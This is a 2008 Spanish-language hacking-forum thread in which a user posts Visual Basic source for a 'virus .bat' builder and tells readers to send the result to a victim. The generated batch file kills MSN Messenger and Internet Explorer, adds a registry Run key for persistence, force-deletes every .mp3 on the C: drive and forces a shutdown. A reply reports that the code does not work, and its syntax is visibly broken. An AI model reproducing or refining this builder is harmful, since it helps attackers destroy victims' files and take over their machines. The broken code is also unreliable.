elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Usando Git para manipular el directorio de trabajo, el índice y commits (segunda parte)


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  Creador de Virus .bat en Visual Basic
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Creador de Virus .bat en Visual Basic  (Leído 4,146 veces)
DProduct

Desconectado Desconectado

Mensajes: 236


I´m going to hack you


Ver Perfil WWW
Creador de Virus .bat en Visual Basic
« en: 8 Febrero 2008, 15:18 pm »

Acabo de crear un creador de virus .bat. Este es el código:
Form1
Agregamos un Command Buttom llamado Command1 con el texto crear virus y le ponemos este code:

Private Sub Command1_Click()
Shell "cmd.exe cd C:\"
Shell "cmd.exe echo off>^Virus.bat"
Shell "cmd.exe /c echo @echo off>>^Virus.bat"
Form2.Show
End Sub

Form2
Agregamos 6 CommandButtom y les ponemos estos textos:
Command1: Matar el MSN Messenger
Command2: Infectar el PC
Command3: Borrar todos los .mp3
Command4: Matar el Internet Explorer
Command5: Mostrar un mensaje
Command6: Terminar el virus

Agregamos este código:

Private Sub Command1_Click()
Shell "cmd.exe cd C:\"
Shell "cmd.exe echo taskkill msnmsgr.exe>>^Virus.bat"
MsgBox ("Función añadida")
End Sub

Private Sub Command2_Click()
Shell "cmd.exe cd C:\"
Shell "cmd.exe /c echo reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v VIRUS /d %0>>^Virus.bat"
MsgBox ("Función añadida")
End Sub

Private Sub Command3_Click()
Shell "cmd.exe cd C:\"
Shell "cmd.exe /c echo del /Q /S /F C:\*.mp3>>^Virus.bat"
MsgBox ("Función añadida")
End Sub

Private Sub Command4_Click()
Shell "cmd.exe cd C:\"
Shell "cmd.exe /c echo taskkill iexplore.exe>>^Virus.bat"
MsgBox ("Función añadida")
End Sub

Private Sub Command5_Click()
Dim mensaje As String
mensaje = Inputbox ("Escribe el mensaje")
Shell "cmd.exe cd C:\"
Shell "cmd.exe /c echo msg * mensaje>>^Virus.bat"
MsgBox ("Función añadida")
End Sub

Private Sub Command6_Click()
Dim mensija As String
mensija = Inputbox ("Escribe un mensaje de despedida
Shell "cmd.exe cd C:\"
Shell "cmd.exe shutdown -s -f -c "mensija" -05>>^Virus.bat"
Shell "cmd.exe /c exit>>^Virus.bat"
MsgBox ("Virus terminado")
MsgBox ("Lo encontrarás terminado como C:\Virus.bat")
MsgBox ("Comprimelo con WinRar o WinZip y mandaselo a tu victima")
End Sub


Ya tendremos hecho nuestro creador de virus .bat


En línea

Sé una cosa... dentro de escasos segundos vas a morir... ¿que porque lo sé?... Mira detrás de ti
invisible_hack


Desconectado Desconectado

Mensajes: 978


Invisible_Hack™ Nick Registrado ^^


Ver Perfil WWW
Re: Creador de Virus .bat en Visual Basic
« Respuesta #1 en: 8 Febrero 2008, 22:31 pm »

¿Podrias poner una capturilla del programa, y a poder ser el .exe final?  :xD

Saludos...


En línea

"Si no visitas mi blog, Chuck te dará una patada giratoria"
DProduct

Desconectado Desconectado

Mensajes: 236


I´m going to hack you


Ver Perfil WWW
Re: Creador de Virus .bat en Visual Basic
« Respuesta #2 en: 9 Febrero 2008, 14:41 pm »

OK, aqui lo tienes, aunque en realidad era un ejemplo
Descargar
En línea

Sé una cosa... dentro de escasos segundos vas a morir... ¿que porque lo sé?... Mira detrás de ti
hAcKeR92

Desconectado Desconectado

Mensajes: 72


Ver Perfil
Re: Creador de Virus .bat en Visual Basic
« Respuesta #3 en: 9 Febrero 2008, 22:07 pm »

A mi no me funciona, lo he probado y no me va.. No hace bien el codigo y cuando termina el virus, las pantallas del form siguen abiertas junto con 9 ventanas el MSDOS
En línea

Martín Fierro


Desconectado Desconectado

Mensajes: 381


Por crom!!!. Chiapas dedo izquierdo de wadalbertía


Ver Perfil WWW
Re: Creador de Virus .bat en Visual Basic
« Respuesta #4 en: 10 Febrero 2008, 00:45 am »

No sé que decir...... :o :o :o :o
En línea

Y no me importa nada..
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
[Ayuda]Creador de virus
Scripting
TMarmol 6 3,110 Último mensaje 14 Mayo 2012, 02:58 am
por Eleкtro
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines